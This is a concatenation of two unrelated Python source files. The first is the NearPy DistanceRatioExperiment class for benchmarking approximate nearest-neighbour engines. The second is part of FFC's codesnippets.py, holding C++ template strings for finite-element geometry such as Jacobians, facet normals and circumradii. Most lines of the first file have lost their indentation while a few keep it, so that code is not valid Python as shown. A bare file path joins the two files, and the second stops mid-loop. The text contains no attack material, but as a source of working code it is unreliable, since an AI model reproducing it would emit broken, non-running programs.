# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from __future__ import print_function
import numpy
import time
import sys
from scipy.spatial.distance import cdist
from nearpy.utils import numpy_array_from_list_or_numpy_array
class DistanceRatioExperiment(object):
"""
Performs nearest neighbour experiments with custom vector data
for all engines in the specified list.
    Distance ratio is the average distance of retrieved approximated
    neighbours that lie outside the radius of the real nearest N
    neighbours, measured relative to this radius.
Let R be the radius of the real N nearest neighbours around the
    query vector. Then a distance ratio of 1.0 means that the average
    approximated nearest neighbour is 2*R away from the query point.
    A distance ratio of 0.0 means that all approximated neighbours are
    within the radius.
This is a much better performance measure for ANN than recall or precision,
because in ANN we are interested in spatial relations between query vector
and the results.
    perform_experiment() returns a list of (distance_ratio, result_size,
    search_time) tuples. These are the averaged values over all query
vectors. search_time is the average retrieval/search time compared
to the average exact search time. result_size is the size of the
retrieved set of approximated neighbours.
    coverage_ratio determines how many of the vectors are used as query
    vectors for exact and approximated search. Because the search comparison
    overhead is quite large, it is best with large data sets (>10000) to
    use a low coverage_ratio (like 0.1) to make the experiment fast. A
    coverage_ratio of 0.1 makes the experiment use 10% of all the vectors
    as query points, that is, it searches for the nearest neighbours of
    10% of all vectors.
"""
def __init__(self, N, vectors, coverage_ratio=0.2):
"""
Performs exact nearest neighbour search on the data set.
vectors can either be a numpy matrix with all the vectors
as columns OR a python array containing the individual
numpy vectors.
"""
# We need a dict from vector string representation to index
self.vector_dict = {}
self.N = N
self.coverage_ratio = coverage_ratio
# Get numpy array representation of input
self.vectors = numpy_array_from_list_or_numpy_array(vectors)
# Build map from vector string representation to vector
for index in range(self.vectors.shape[1]):
self.vector_dict[self.__vector_to_string(
self.vectors[:, index])] = index
# Get transposed version of vector matrix, so that the rows
# are the vectors (needed by cdist)
vectors_t = numpy.transpose(self.vectors)
# Determine the indices of query vectors used for comparance
# with approximated search.
query_count = numpy.floor(self.coverage_ratio *
self.vectors.shape[1])
self.query_indices = []
for k in range(int(query_count)):
index = numpy.floor(k*(self.vectors.shape[1]/query_count))
index = min(index, self.vectors.shape[1]-1)
self.query_indices.append(int(index))
print('\nStarting exact search (query set size=%d)...\n' % query_count)
# For each query vector get radius of closest N neighbours
self.nearest_radius = {}
self.exact_search_time_per_vector = 0.0
for index in self.query_indices:
v = vectors_t[index, :].reshape(1, self.vectors.shape[0])
exact_search_start_time = time.time()
D = cdist(v, vectors_t, 'euclidean')
# Get radius of closest N neighbours
            self.nearest_radius[index] = numpy.sort(D)[0, N]
# Save time needed for exact search
exact_search_time = time.time() - exact_search_start_time
self.exact_search_time_per_vector += exact_search_time
        print('\nDone with exact search...\n')
# Normalize search time
self.exact_search_time_per_vector /= float(len(self.query_indices))
def perform_experiment(self, engine_list):
"""
Performs nearest neighbour experiments with custom vector data
for all engines in the specified list.
        Returns a list of (distance_ratio, result_size, search_time)
        tuples. All are the averaged values over all query vectors.
search_time is the average retrieval/search time compared to the
average exact search time.
"""
# We will fill this array with measures for all the engines.
result = []
# For each engine, first index vectors and then retrieve neighbours
for engine in engine_list:
print('Engine %d / %d' % (engine_list.index(engine),
len(engine_list)))
# Clean storage
engine.clean_all_buckets()
# Use this to compute average distance_ratio
avg_distance_ratio = 0.0
# Use this to compute average result set size
avg_result_size = 0.0
# Use this to compute average search time
avg_search_time = 0.0
# Index all vectors and store them
for index in range(self.vectors.shape[1]):
engine.store_vector(self.vectors[:, index],
'data_%d' % index)
# Look for N nearest neighbours for query vectors
for index in self.query_indices:
# We have to time the search
search_time_start = time.time()
# Get nearest N according to engine
nearest = engine.neighbours(self.vectors[:, index])
# Get search time
search_time = time.time() - search_time_start
# Get average distance ratio (with respect to radius
# of real N closest neighbours)
distance_ratio = 0.0
for n in nearest:
# If the vector is outside the real neighbour radius
if n[2] > self.nearest_radius[index]:
# Compute distance to real neighbour radius
d = (n[2] - self.nearest_radius[index])
# And normalize it. 1.0 means: distance to
# real neighbour radius is identical to radius
d /= self.nearest_radius[index]
# If all neighbours are in the radius, the
# distance ratio is 0.0
distance_ratio += d
# Normalize distance ratio over all neighbours
distance_ratio /= len(nearest)
# Add to accumulator
avg_distance_ratio += distance_ratio
# Add to accumulator
avg_result_size += len(nearest)
# Add to accumulator
avg_search_time += search_time
# Normalize distance ratio over query set
avg_distance_ratio /= float(len(self.query_indices))
# Normalize avg result size
avg_result_size /= float(len(self.query_indices))
# Normalize search time over query set
avg_search_time = avg_search_time / float(len(self.query_indices))
# Normalize search time with respect to exact search
avg_search_time /= self.exact_search_time_per_vector
print(' distance_ratio=%f, result_size=%f, time=%f' % (avg_distance_ratio,
avg_result_size,
avg_search_time))
result.append((avg_distance_ratio, avg_result_size, avg_search_time))
return result
def __vector_to_string(self, vector):
""" Returns string representation of vector. """
return numpy.array_str(vector)
def __index_of_vector(self, vector):
""" Returns index of specified vector from test data set. """
        return self.vector_dict[self.__vector_to_string(vector)]
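

# Minimal usage sketch (illustrative; assumes the standard NearPy Engine API):
if __name__ == "__main__":
    from nearpy import Engine
    from nearpy.hashes import RandomBinaryProjections

    # 1000 vectors of dimension 20, stored as columns
    vectors = numpy.random.randn(20, 1000)
    engine = Engine(20, lshashes=[RandomBinaryProjections('rbp', 10)])
    experiment = DistanceRatioExperiment(10, vectors, coverage_ratio=0.1)
    # One (distance_ratio, result_size, search_time) tuple per engine
    print(experiment.perform_experiment([engine]))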
/FFC-2017.1.0.tar.gz/FFC-2017.1.0/ffc/codesnippets.py
# Copyright (C) 2007-2016 Anders Logg
#
# This file is part of FFC.
#
# FFC is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# FFC is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with FFC. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by Kristian B. Oelgaard 2010-2013
# Modified by Marie Rognes 2007-2012
# Modified by Peter Brune 2009
# Modified by Martin Sandve Alnæs, 2013
#
# First added: 2007-02-28
# Last changed: 2014-06-10
"Code snippets for code generation."
__all__ = ["comment_ufc", "comment_dolfin", "header_h", "header_c", "footer",
"compute_jacobian", "compute_jacobian_inverse",
"eval_basis_decl", "eval_basis_init", "eval_basis", "eval_basis_copy",
"eval_derivs_decl", "eval_derivs_init", "eval_derivs", "eval_derivs_copy"]
__old__ = ["evaluate_f",
"facet_determinant", "map_onto_physical",
"fiat_coordinate_map", "transform_snippet",
"scale_factor", "combinations_snippet",
"normal_direction",
"facet_normal", "ip_coordinates", "cell_volume", "circumradius",
"facet_area", "min_facet_edge_length", "max_facet_edge_length",
"orientation_snippet"]
__all__ += __old__
comment_ufc = """\
// This code conforms with the UFC specification version %(ufc_version)s
// and was automatically generated by FFC version %(ffc_version)s.
"""
comment_dolfin = """\
// This code conforms with the UFC specification version %(ufc_version)s
// and was automatically generated by FFC version %(ffc_version)s.
//
// This code was generated with the option '-l dolfin' and
// contains DOLFIN-specific wrappers that depend on DOLFIN.
"""
# Code snippets for headers and footers
header_h = """\
#ifndef __%(prefix_upper)s_H
#define __%(prefix_upper)s_H
"""
header_c = """\
#include "%(prefix)s.h"
"""
footer = """\
#endif
"""
# Code snippets for computing Jacobians
_compute_jacobian_interval_1d = """\
// Compute Jacobian
double J%(restriction)s[1];
compute_jacobian_interval_1d(J%(restriction)s, coordinate_dofs%(restriction)s);
"""
_compute_jacobian_interval_2d = """\
// Compute Jacobian
double J%(restriction)s[2];
compute_jacobian_interval_2d(J%(restriction)s, coordinate_dofs%(restriction)s);
"""
_compute_jacobian_interval_3d = """\
// Compute Jacobian
double J%(restriction)s[3];
compute_jacobian_interval_3d(J%(restriction)s, coordinate_dofs%(restriction)s);
"""
_compute_jacobian_triangle_2d = """\
// Compute Jacobian
double J%(restriction)s[4];
compute_jacobian_triangle_2d(J%(restriction)s, coordinate_dofs%(restriction)s);
"""
_compute_jacobian_triangle_3d = """\
// Compute Jacobian
double J%(restriction)s[6];
compute_jacobian_triangle_3d(J%(restriction)s, coordinate_dofs%(restriction)s);
"""
_compute_jacobian_tetrahedron_3d = """\
// Compute Jacobian
double J%(restriction)s[9];
compute_jacobian_tetrahedron_3d(J%(restriction)s, coordinate_dofs%(restriction)s);
"""
compute_jacobian = {1: {1: _compute_jacobian_interval_1d,
2: _compute_jacobian_interval_2d,
3: _compute_jacobian_interval_3d},
2: {2: _compute_jacobian_triangle_2d,
3: _compute_jacobian_triangle_3d},
3: {3: _compute_jacobian_tetrahedron_3d}}
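
# Illustrative: snippets are keyed first by topological and then by geometric
# dimension and instantiated via %-substitution, e.g.
#
#     code = compute_jacobian[2][3] % {"restriction": "_0"}
#
# emits C++ declaring J_0[6] for a triangle embedded in 3D.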
# Code snippets for computing Jacobian inverses
_compute_jacobian_inverse_interval_1d = """\
// Compute Jacobian inverse and determinant
double K%(restriction)s[1];
double detJ%(restriction)s;
compute_jacobian_inverse_interval_1d(K%(restriction)s, detJ%(restriction)s, J%(restriction)s);
"""
_compute_jacobian_inverse_interval_2d = """\
// Compute Jacobian inverse and determinant
double K%(restriction)s[2];
double detJ%(restriction)s;
compute_jacobian_inverse_interval_2d(K%(restriction)s, detJ%(restriction)s, J%(restriction)s);
"""
_compute_jacobian_inverse_interval_3d = """\
// Compute Jacobian inverse and determinant
double K%(restriction)s[3];
double detJ%(restriction)s;
compute_jacobian_inverse_interval_3d(K%(restriction)s, detJ%(restriction)s, J%(restriction)s);
"""
_compute_jacobian_inverse_triangle_2d = """\
// Compute Jacobian inverse and determinant
double K%(restriction)s[4];
double detJ%(restriction)s;
compute_jacobian_inverse_triangle_2d(K%(restriction)s, detJ%(restriction)s, J%(restriction)s);
"""
_compute_jacobian_inverse_triangle_3d = """\
// Compute Jacobian inverse and determinant
double K%(restriction)s[6];
double detJ%(restriction)s;
compute_jacobian_inverse_triangle_3d(K%(restriction)s, detJ%(restriction)s, J%(restriction)s);
"""
_compute_jacobian_inverse_tetrahedron_3d = """\
// Compute Jacobian inverse and determinant
double K%(restriction)s[9];
double detJ%(restriction)s;
compute_jacobian_inverse_tetrahedron_3d(K%(restriction)s, detJ%(restriction)s, J%(restriction)s);
"""
compute_jacobian_inverse = {1: {1: _compute_jacobian_inverse_interval_1d,
2: _compute_jacobian_inverse_interval_2d,
3: _compute_jacobian_inverse_interval_3d},
2: {2: _compute_jacobian_inverse_triangle_2d,
3: _compute_jacobian_inverse_triangle_3d},
3: {3: _compute_jacobian_inverse_tetrahedron_3d}}
# Code snippet for scale factor
scale_factor = """\
// Set scale factor
const double det = std::abs(detJ);"""
# FIXME: Old stuff below that should be cleaned up or moved to ufc_geometry.h
orientation_snippet = """
// Check orientation
if (cell_orientation%(restriction)s == -1)
throw std::runtime_error("cell orientation must be defined (not -1)");
// (If cell_orientation == 1, i.e. pointing down, multiply det(J) by -1)
else if (cell_orientation%(restriction)s == 1)
detJ%(restriction)s *= -1;
"""
evaluate_f = "f.evaluate(vals, y, c);"
_facet_determinant_1D = """\
// Facet determinant 1D (vertex)
const double det = 1.0;"""
_facet_determinant_2D = """\
// Get vertices on edge
static unsigned int edge_vertices[3][2] = {{1, 2}, {0, 2}, {0, 1}};
const unsigned int v0 = edge_vertices[facet%(restriction)s][0];
const unsigned int v1 = edge_vertices[facet%(restriction)s][1];
// Compute scale factor (length of edge scaled by length of reference interval)
const double dx0 = coordinate_dofs%(restriction)s[2*v1 + 0] - coordinate_dofs%(restriction)s[2*v0 + 0];
const double dx1 = coordinate_dofs%(restriction)s[2*v1 + 1] - coordinate_dofs%(restriction)s[2*v0 + 1];
const double det = std::sqrt(dx0*dx0 + dx1*dx1);
"""
_facet_determinant_2D_1D = """\
// Facet determinant 1D in 2D (vertex)
const double det = 1.0;
"""
_facet_determinant_3D = """\
// Get vertices on face
static unsigned int face_vertices[4][3] = {{1, 2, 3}, {0, 2, 3}, {0, 1, 3}, {0, 1, 2}};
const unsigned int v0 = face_vertices[facet%(restriction)s][0];
const unsigned int v1 = face_vertices[facet%(restriction)s][1];
const unsigned int v2 = face_vertices[facet%(restriction)s][2];
// Compute scale factor (area of face scaled by area of reference triangle)
const double a0 = (coordinate_dofs%(restriction)s[3*v0 + 1]*coordinate_dofs%(restriction)s[3*v1 + 2] + coordinate_dofs%(restriction)s[3*v0 + 2]*coordinate_dofs%(restriction)s[3*v2 + 1] + coordinate_dofs%(restriction)s[3*v1 + 1]*coordinate_dofs%(restriction)s[3*v2 + 2]) - (coordinate_dofs%(restriction)s[3*v2 + 1]*coordinate_dofs%(restriction)s[3*v1 + 2] + coordinate_dofs%(restriction)s[3*v2 + 2]*coordinate_dofs%(restriction)s[3*v0 + 1] + coordinate_dofs%(restriction)s[3*v1 + 1]*coordinate_dofs%(restriction)s[3*v0 + 2]);
const double a1 = (coordinate_dofs%(restriction)s[3*v0 + 2]*coordinate_dofs%(restriction)s[3*v1 + 0] + coordinate_dofs%(restriction)s[3*v0 + 0]*coordinate_dofs%(restriction)s[3*v2 + 2] + coordinate_dofs%(restriction)s[3*v1 + 2]*coordinate_dofs%(restriction)s[3*v2 + 0]) - (coordinate_dofs%(restriction)s[3*v2 + 2]*coordinate_dofs%(restriction)s[3*v1 + 0] + coordinate_dofs%(restriction)s[3*v2 + 0]*coordinate_dofs%(restriction)s[3*v0 + 2] + coordinate_dofs%(restriction)s[3*v1 + 2]*coordinate_dofs%(restriction)s[3*v0 + 0]);
const double a2 = (coordinate_dofs%(restriction)s[3*v0 + 0]*coordinate_dofs%(restriction)s[3*v1 + 1] + coordinate_dofs%(restriction)s[3*v0 + 1]*coordinate_dofs%(restriction)s[3*v2 + 0] + coordinate_dofs%(restriction)s[3*v1 + 0]*coordinate_dofs%(restriction)s[3*v2 + 1]) - (coordinate_dofs%(restriction)s[3*v2 + 0]*coordinate_dofs%(restriction)s[3*v1 + 1] + coordinate_dofs%(restriction)s[3*v2 + 1]*coordinate_dofs%(restriction)s[3*v0 + 0] + coordinate_dofs%(restriction)s[3*v1 + 0]*coordinate_dofs%(restriction)s[3*v0 + 1]);
const double det = std::sqrt(a0*a0 + a1*a1 + a2*a2);
"""
_facet_determinant_3D_2D = """\
// Facet determinant 2D in 3D (edge)
// Get vertices on edge
static unsigned int edge_vertices[3][2] = {{1, 2}, {0, 2}, {0, 1}};
const unsigned int v0 = edge_vertices[facet%(restriction)s][0];
const unsigned int v1 = edge_vertices[facet%(restriction)s][1];
// Compute scale factor (length of edge scaled by length of reference interval)
const double dx0 = coordinate_dofs%(restriction)s[3*v1 + 0] - coordinate_dofs%(restriction)s[3*v0 + 0];
const double dx1 = coordinate_dofs%(restriction)s[3*v1 + 1] - coordinate_dofs%(restriction)s[3*v0 + 1];
const double dx2 = coordinate_dofs%(restriction)s[3*v1 + 2] - coordinate_dofs%(restriction)s[3*v0 + 2];
const double det = std::sqrt(dx0*dx0 + dx1*dx1 + dx2*dx2);
"""
_facet_determinant_3D_1D = """\
// Facet determinant 1D in 3D (vertex)
const double det = 1.0;
"""
_normal_direction_1D = """\
const bool direction = facet%(restriction)s == 0 ? coordinate_dofs%(restriction)s[0] > coordinate_dofs%(restriction)s[1] : coordinate_dofs%(restriction)s[1] > coordinate_dofs%(restriction)s[0];
"""
_normal_direction_2D = """\
const bool direction = dx1*(coordinate_dofs%(restriction)s[2*%(facet)s] - coordinate_dofs%(restriction)s[2*v0]) - dx0*(coordinate_dofs%(restriction)s[2*%(facet)s + 1] - coordinate_dofs%(restriction)s[2*v0 + 1]) < 0;
"""
_normal_direction_3D = """\
const bool direction = a0*(coordinate_dofs%(restriction)s[3*%(facet)s] - coordinate_dofs%(restriction)s[3*v0]) + a1*(coordinate_dofs%(restriction)s[3*%(facet)s + 1] - coordinate_dofs%(restriction)s[3*v0 + 1]) + a2*(coordinate_dofs%(restriction)s[3*%(facet)s + 2] - coordinate_dofs%(restriction)s[3*v0 + 2]) < 0;
"""
# MER: Coding all up in _facet_normal_ND_M_D for now; these are
# therefore empty.
_normal_direction_2D_1D = ""
_normal_direction_3D_2D = ""
_normal_direction_3D_1D = ""
_facet_normal_1D = """
// Facet normals are 1.0 or -1.0: (-1.0) <-- X------X --> (1.0)
const double n%(restriction)s = %(direction)sdirection ? 1.0 : -1.0;"""
_facet_normal_2D = """\
// Compute facet normals from the facet scale factor constants
const double n%(restriction)s0 = %(direction)sdirection ? dx1 / det : -dx1 / det;
const double n%(restriction)s1 = %(direction)sdirection ? -dx0 / det : dx0 / det;"""
_facet_normal_2D_1D = """
// Compute facet normal
double n%(restriction)s0 = 0.0;
double n%(restriction)s1 = 0.0;
if (facet%(restriction)s == 0)
{
n%(restriction)s0 = coordinate_dofs%(restriction)s[0] - coordinate_dofs%(restriction)s[2];
n%(restriction)s1 = coordinate_dofs%(restriction)s[1] - coordinate_dofs%(restriction)s[3];
}
else
{
n%(restriction)s0 = coordinate_dofs%(restriction)s[2] - coordinate_dofs%(restriction)s[0];
n%(restriction)s1 = coordinate_dofs%(restriction)s[3] - coordinate_dofs%(restriction)s[1];
}
const double n%(restriction)s_length = std::sqrt(n%(restriction)s0*n%(restriction)s0 + n%(restriction)s1*n%(restriction)s1);
n%(restriction)s0 /= n%(restriction)s_length;
n%(restriction)s1 /= n%(restriction)s_length;
"""
_facet_normal_3D = """
const double n%(restriction)s0 = %(direction)sdirection ? a0 / det : -a0 / det;
const double n%(restriction)s1 = %(direction)sdirection ? a1 / det : -a1 / det;
const double n%(restriction)s2 = %(direction)sdirection ? a2 / det : -a2 / det;"""
_facet_normal_3D_2D = """
// Compute facet normal for triangles in 3D
const unsigned int vertex%(restriction)s0 = facet%(restriction)s;
// Get coordinates corresponding the vertex opposite this
// static unsigned int edge_vertices[3][2] = {{1, 2}, {0, 2}, {0, 1}};
const unsigned int vertex%(restriction)s1 = edge_vertices[facet%(restriction)s][0];
const unsigned int vertex%(restriction)s2 = edge_vertices[facet%(restriction)s][1];
// Define vectors n = (p2 - p0) and t = normalized (p2 - p1)
double n%(restriction)s0 = coordinate_dofs%(restriction)s[3*vertex%(restriction)s2 + 0] - coordinate_dofs%(restriction)s[3*vertex%(restriction)s0 + 0];
double n%(restriction)s1 = coordinate_dofs%(restriction)s[3*vertex%(restriction)s2 + 1] - coordinate_dofs%(restriction)s[3*vertex%(restriction)s0 + 1];
double n%(restriction)s2 = coordinate_dofs%(restriction)s[3*vertex%(restriction)s2 + 2] - coordinate_dofs%(restriction)s[3*vertex%(restriction)s0 + 2];
double t%(restriction)s0 = coordinate_dofs%(restriction)s[3*vertex%(restriction)s2 + 0] - coordinate_dofs%(restriction)s[3*vertex%(restriction)s1 + 0];
double t%(restriction)s1 = coordinate_dofs%(restriction)s[3*vertex%(restriction)s2 + 1] - coordinate_dofs%(restriction)s[3*vertex%(restriction)s1 + 1];
double t%(restriction)s2 = coordinate_dofs%(restriction)s[3*vertex%(restriction)s2 + 2] - coordinate_dofs%(restriction)s[3*vertex%(restriction)s1 + 2];
const double t%(restriction)s_length = std::sqrt(t%(restriction)s0*t%(restriction)s0 + t%(restriction)s1*t%(restriction)s1 + t%(restriction)s2*t%(restriction)s2);
t%(restriction)s0 /= t%(restriction)s_length;
t%(restriction)s1 /= t%(restriction)s_length;
t%(restriction)s2 /= t%(restriction)s_length;
// Subtract, the projection of (p2 - p0) onto (p2 - p1), from (p2 - p0)
const double ndott%(restriction)s = t%(restriction)s0*n%(restriction)s0 + t%(restriction)s1*n%(restriction)s1 + t%(restriction)s2*n%(restriction)s2;
n%(restriction)s0 -= ndott%(restriction)s*t%(restriction)s0;
n%(restriction)s1 -= ndott%(restriction)s*t%(restriction)s1;
n%(restriction)s2 -= ndott%(restriction)s*t%(restriction)s2;
const double n%(restriction)s_length = std::sqrt(n%(restriction)s0*n%(restriction)s0 + n%(restriction)s1*n%(restriction)s1 + n%(restriction)s2*n%(restriction)s2);
// Normalize
n%(restriction)s0 /= n%(restriction)s_length;
n%(restriction)s1 /= n%(restriction)s_length;
n%(restriction)s2 /= n%(restriction)s_length;
"""
_facet_normal_3D_1D = """
// Compute facet normal
double n%(restriction)s0 = 0.0;
double n%(restriction)s1 = 0.0;
double n%(restriction)s2 = 0.0;
if (facet%(restriction)s == 0)
{
n%(restriction)s0 = coordinate_dofs%(restriction)s[0] - coordinate_dofs%(restriction)s[3];
n%(restriction)s1 = coordinate_dofs%(restriction)s[1] - coordinate_dofs%(restriction)s[4];
n%(restriction)s2 = coordinate_dofs%(restriction)s[2] - coordinate_dofs%(restriction)s[5];
}
else
{
n%(restriction)s0 = coordinate_dofs%(restriction)s[3] - coordinate_dofs%(restriction)s[0];
n%(restriction)s1 = coordinate_dofs%(restriction)s[4] - coordinate_dofs%(restriction)s[1];
n%(restriction)s2 = coordinate_dofs%(restriction)s[5] - coordinate_dofs%(restriction)s[2];
}
const double n%(restriction)s_length = std::sqrt(n%(restriction)s0*n%(restriction)s0 + n%(restriction)s1*n%(restriction)s1 + n%(restriction)s2*n%(restriction)s2);
n%(restriction)s0 /= n%(restriction)s_length;
n%(restriction)s1 /= n%(restriction)s_length;
n%(restriction)s2 /= n%(restriction)s_length;
"""
_cell_volume_1D = """\
// Compute cell volume
const double volume%(restriction)s = std::abs(detJ%(restriction)s);
"""
_cell_volume_2D = """\
// Compute cell volume
const double volume%(restriction)s = std::abs(detJ%(restriction)s)/2.0;
"""
_cell_volume_2D_1D = """\
// Compute cell volume of interval in 2D
const double volume%(restriction)s = std::abs(detJ%(restriction)s);
"""
_cell_volume_3D = """\
// Compute cell volume
const double volume%(restriction)s = std::abs(detJ%(restriction)s)/6.0;
"""
_cell_volume_3D_1D = """\
// Compute cell volume of interval in 3D
const double volume%(restriction)s = std::abs(detJ%(restriction)s);
"""
_cell_volume_3D_2D = """\
// Compute cell volume of triangle in 3D
const double volume%(restriction)s = std::abs(detJ%(restriction)s)/2.0;
"""
_circumradius_1D = """\
// Compute circumradius; in 1D it is equal to half the cell length
const double circumradius%(restriction)s = std::abs(detJ%(restriction)s)/2.0;
"""
_circumradius_2D = """\
// Compute circumradius of triangle in 2D
const double v1v2%(restriction)s = std::sqrt((coordinate_dofs%(restriction)s[4] - coordinate_dofs%(restriction)s[2])*(coordinate_dofs%(restriction)s[4] - coordinate_dofs%(restriction)s[2]) + (coordinate_dofs%(restriction)s[5] - coordinate_dofs%(restriction)s[3])*(coordinate_dofs%(restriction)s[5] - coordinate_dofs%(restriction)s[3]) );
const double v0v2%(restriction)s = std::sqrt(J%(restriction)s[3]*J%(restriction)s[3] + J%(restriction)s[1]*J%(restriction)s[1]);
const double v0v1%(restriction)s = std::sqrt(J%(restriction)s[0]*J%(restriction)s[0] + J%(restriction)s[2]*J%(restriction)s[2]);
const double circumradius%(restriction)s = 0.25*(v1v2%(restriction)s*v0v2%(restriction)s*v0v1%(restriction)s)/(volume%(restriction)s);
"""
_circumradius_2D_1D = """\
// Compute circumradius of interval in 2D (1/2 volume)
const double circumradius%(restriction)s = std::abs(detJ%(restriction)s)/2.0;
"""
_circumradius_3D = """\
// Compute circumradius
const double v1v2%(restriction)s = std::sqrt( (coordinate_dofs%(restriction)s[6] - coordinate_dofs%(restriction)s[3])*(coordinate_dofs%(restriction)s[6] - coordinate_dofs%(restriction)s[3]) + (coordinate_dofs%(restriction)s[7] - coordinate_dofs%(restriction)s[4])*(coordinate_dofs%(restriction)s[7] - coordinate_dofs%(restriction)s[4]) + (coordinate_dofs%(restriction)s[8] - coordinate_dofs%(restriction)s[5])*(coordinate_dofs%(restriction)s[8] - coordinate_dofs%(restriction)s[5]) );
const double v0v2%(restriction)s = std::sqrt(J%(restriction)s[1]*J%(restriction)s[1] + J%(restriction)s[4]*J%(restriction)s[4] + J%(restriction)s[7]*J%(restriction)s[7]);
const double v0v1%(restriction)s = std::sqrt(J%(restriction)s[0]*J%(restriction)s[0] + J%(restriction)s[3]*J%(restriction)s[3] + J%(restriction)s[6]*J%(restriction)s[6]);
const double v0v3%(restriction)s = std::sqrt(J%(restriction)s[2]*J%(restriction)s[2] + J%(restriction)s[5]*J%(restriction)s[5] + J%(restriction)s[8]*J%(restriction)s[8]);
const double v1v3%(restriction)s = std::sqrt( (coordinate_dofs%(restriction)s[9] - coordinate_dofs%(restriction)s[3])*(coordinate_dofs%(restriction)s[9] - coordinate_dofs%(restriction)s[3]) + (coordinate_dofs%(restriction)s[10] - coordinate_dofs%(restriction)s[4])*(coordinate_dofs%(restriction)s[10] - coordinate_dofs%(restriction)s[4]) + (coordinate_dofs%(restriction)s[11] - coordinate_dofs%(restriction)s[5])*(coordinate_dofs%(restriction)s[11] - coordinate_dofs%(restriction)s[5]) );
const double v2v3%(restriction)s = std::sqrt( (coordinate_dofs%(restriction)s[9] - coordinate_dofs%(restriction)s[6])*(coordinate_dofs%(restriction)s[9] - coordinate_dofs%(restriction)s[6]) + (coordinate_dofs%(restriction)s[10] - coordinate_dofs%(restriction)s[7])*(coordinate_dofs%(restriction)s[10] - coordinate_dofs%(restriction)s[7]) + (coordinate_dofs%(restriction)s[11] - coordinate_dofs%(restriction)s[8])*(coordinate_dofs%(restriction)s[11] - coordinate_dofs%(restriction)s[8]) );
const double la%(restriction)s = v1v2%(restriction)s*v0v3%(restriction)s;
const double lb%(restriction)s = v0v2%(restriction)s*v1v3%(restriction)s;
const double lc%(restriction)s = v0v1%(restriction)s*v2v3%(restriction)s;
const double s%(restriction)s = 0.5*(la%(restriction)s+lb%(restriction)s+lc%(restriction)s);
const double area%(restriction)s = std::sqrt(s%(restriction)s*(s%(restriction)s-la%(restriction)s)*(s%(restriction)s-lb%(restriction)s)*(s%(restriction)s-lc%(restriction)s));
const double circumradius%(restriction)s = area%(restriction)s / ( 6.0*volume%(restriction)s );
"""
_circumradius_3D_1D = """\
// Compute circumradius of interval in 3D (1/2 volume)
const double circumradius%(restriction)s = std::abs(detJ%(restriction)s)/2.0;
"""
_circumradius_3D_2D = """\
// Compute circumradius of triangle in 3D
const double v1v2%(restriction)s = std::sqrt( (coordinate_dofs%(restriction)s[6] - coordinate_dofs%(restriction)s[3])*(coordinate_dofs%(restriction)s[6] - coordinate_dofs%(restriction)s[3]) + (coordinate_dofs%(restriction)s[7] - coordinate_dofs%(restriction)s[4])*(coordinate_dofs%(restriction)s[7] - coordinate_dofs%(restriction)s[4]) + (coordinate_dofs%(restriction)s[8] - coordinate_dofs%(restriction)s[5])*(coordinate_dofs%(restriction)s[8] - coordinate_dofs%(restriction)s[5]));
const double v0v2%(restriction)s = std::sqrt( J%(restriction)s[3]*J%(restriction)s[3] + J%(restriction)s[1]*J%(restriction)s[1] + J%(restriction)s[5]*J%(restriction)s[5]);
const double v0v1%(restriction)s = std::sqrt( J%(restriction)s[0]*J%(restriction)s[0] + J%(restriction)s[2]*J%(restriction)s[2] + J%(restriction)s[4]*J%(restriction)s[4]);
const double circumradius%(restriction)s = 0.25*(v1v2%(restriction)s*v0v2%(restriction)s*v0v1%(restriction)s)/(volume%(restriction)s);
"""
_facet_area_1D = """\
// Facet area (FIXME: Should this be 0.0?)
const double facet_area = 1.0;"""
_facet_area_2D = """\
// Facet area
const double facet_area = det;"""
_facet_area_2D_1D = """\
// Facet area
const double facet_area = 1.0;"""
_facet_area_3D = """\
// Facet area (divide by two because 'det' is scaled by area of reference triangle)
const double facet_area = det/2.0;"""
_facet_area_3D_1D = """\
// Facet area
const double facet_area = 1.0;"""
_facet_area_3D_2D = """\
// Facet area
const double facet_area = det;"""
evaluate_basis_dofmap = """\
unsigned int element = 0;
unsigned int tmp = 0;
for (unsigned int j = 0; j < %d; j++)
{
if (tmp + dofs_per_element[j] > i)
{
i -= tmp;
element = element_types[j];
break;
}
else
tmp += dofs_per_element[j];
}"""
_min_facet_edge_length_3D = """\
// Min edge length of facet
double min_facet_edge_length;
compute_min_facet_edge_length_tetrahedron_3d(min_facet_edge_length, facet%(restriction)s, coordinate_dofs%(restriction)s);
"""
_max_facet_edge_length_3D = """\
// Max edge length of facet
double max_facet_edge_length;
compute_max_facet_edge_length_tetrahedron_3d(max_facet_edge_length, facet%(restriction)s, coordinate_dofs%(restriction)s);
"""
# FIXME: This is dead slow because of all the new calls
# Used in evaluate_basis_derivatives. For second order derivatives in 2D it will
# generate the combinations: [(0, 0), (0, 1), (1, 0), (1, 1)] (i.e., xx, xy, yx, yy)
# which will also be the ordering of derivatives in the return value.
combinations_snippet = """\
// Declare two dimensional array that holds combinations of derivatives and initialise
unsigned int %(combinations)s[%(max_num_derivatives)s][%(max_degree)s];
for (unsigned int row = 0; row < %(max_num_derivatives)s; row++)
{
for (unsigned int col = 0; col < %(max_degree)s; col++)
%(combinations)s[row][col] = 0;
}
// Generate combinations of derivatives
for (unsigned int row = 1; row < %(num_derivatives)s; row++)
